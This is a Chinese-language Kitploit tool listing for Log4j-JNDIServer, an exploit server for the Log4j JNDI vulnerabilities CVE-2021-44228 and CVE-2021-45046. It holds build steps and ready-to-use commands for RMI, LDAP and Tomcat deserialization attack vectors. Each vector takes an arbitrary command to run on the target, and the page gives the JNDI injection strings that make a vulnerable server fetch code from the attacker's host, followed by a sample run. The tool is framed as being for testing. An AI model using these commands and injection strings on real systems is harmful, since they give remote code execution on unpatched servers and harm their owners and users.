Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4j-JNDIServer — 该项目将帮助测试Log4j CVE-2021-44228漏洞。 | Kitploit
工具/GitHubGitHub/immunityinc/log4j-jndiserver
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用命令与控制远程访问工具
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

该项目将帮助测试Log4j CVE-2021-44228漏洞。

查看仓库
924年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4j-JNDIServer

该项目将帮助测试 Log4j CVE-2021-44228/CVE-2021-45046 漏洞。

安装与构建

  • 在 Intellij Idea 中加载项目
  • 在“项目设置”(CTRL + ALT + SHIFT + S)中选择 JDK
  • 在“项目设置”中,创建构件(Artifact) -> “构件” -> “从模块创建 JAR” -> 在“JAR 文件来自库”中,标记“提取到目标 JAR” -> “确定”
  • 构建项目(CTRL + F9)。这将在 /out/artifacts/ 文件夹中生成 jar 文件

使用 Maven 构建

需要 Java 1.8+ 和 Maven 3.x+

  • mvn clean package -DskipTests
  • 你将在 /target 文件夹中找到 .jar 文件

使用方法

1.RMI 攻击向量

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

你不再需要托管 Exploit.class。该应用程序将在指定端口上启动一个 HTTP 服务器。

你必须指明要在目标上运行的命令。

注入:{jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2.LDAP 攻击向量

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

你不再需要托管 Exploit.class。该应用程序将在指定端口上启动一个 HTTP 服务器。

你必须指明要在目标上运行的命令。

注入:{jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3.反序列化攻击向量(使用 Tomcat 负载)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

注入:{jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

示例

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- 为 Tomcat 启动 RMI 服务器 -
- 在端口 1389 上创建 RMI 服务器 -
- 引用已绑定! -
- RMI 服务器已在 127.0.0.1:1389 启动 -
- Log4J 注入路径:${jndi:rmi://127.0.0.1:1389/Foo} -
下载工具